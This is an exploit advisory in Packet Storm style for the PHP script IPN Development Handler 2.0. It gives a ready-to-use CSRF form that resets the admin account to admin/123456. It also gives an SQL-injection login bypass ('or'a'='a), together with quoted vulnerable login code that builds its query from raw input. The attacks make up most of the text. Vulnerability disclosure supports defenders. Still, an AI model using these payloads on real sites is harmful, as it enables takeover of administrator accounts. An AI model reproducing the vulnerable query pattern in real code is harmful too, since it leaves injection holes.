IPN Development Handler 2.0 SQL Injection / Cross Site Request Forgery

2010-12-23T00:00:00
ID PACKETSTORM:96942
Type packetstorm
Reporter AtT4CKxT3rR0r1ST
Modified 2010-12-23T00:00:00

Description

                                        
                                            `IPN Development Handler v2.0 CSRF (Change Admin Account)  
==============================================================  
  
####################################################################  
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]  
.:. Script : http://scripts.filehungry.com/product/php/e-commerce/paypal/ipn_development_handler/  
  
####################################################################  
  
  
===[ Exploit ]===  
  
<form method="POST" name="form0" action="http://localhost/siteadmin/EditInfo.php">  
<input type="hidden" name="username" value="admin"/>  
<input type="hidden" name="password" value="123456"/>  
<input type="hidden" name="password2" value="123456"/>  
<input type="hidden" name="s1" value="Update"/>  
</form>  
  
</body>  
</html>  
  
####################################################################  
  
IPN Development Handler v2.0 Auth Bypass  
==============================================================  
  
####################################################################  
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]  
.:. Script : http://scripts.filehungry.com/product/php/e-commerce/paypal/ipn_development_handler/  
  
####################################################################  
  
===[ Vulnerability ]===  
Source Code path/siteadmin/login.php  
  
if(isset($_POST[s2]))  
{  
$MyUsername1 = strip_tags($_POST[username1]);  
$MyPassword1 = strip_tags($_POST[password1]);  
  
if(empty($MyUsername1) || empty($MyPassword1))  
{  
$MyError = "<center><font color=red size=2 face=verdana><b>All fields are required!</b></font></center>";  
}  
else  
{  
//check the login info if exists  
$q1 = "select * from dd_admin where username = '$MyUsername1' and password = '$MyPassword1' ";  
  
$r1 = mysql_query($q1);  
  
if(!$r1)  
{  
echo mysql_error();  
exit();  
  
===[ Exploit ]===  
  
1- Go to Siteadmin [www.site.com/siteadmin/login.php]  
2- join code Auth Bypass in Username & Password  
3- Username: 'or'a'='a  
Password: 'or'a'='a  
  
  
####################################################################  
  
  
`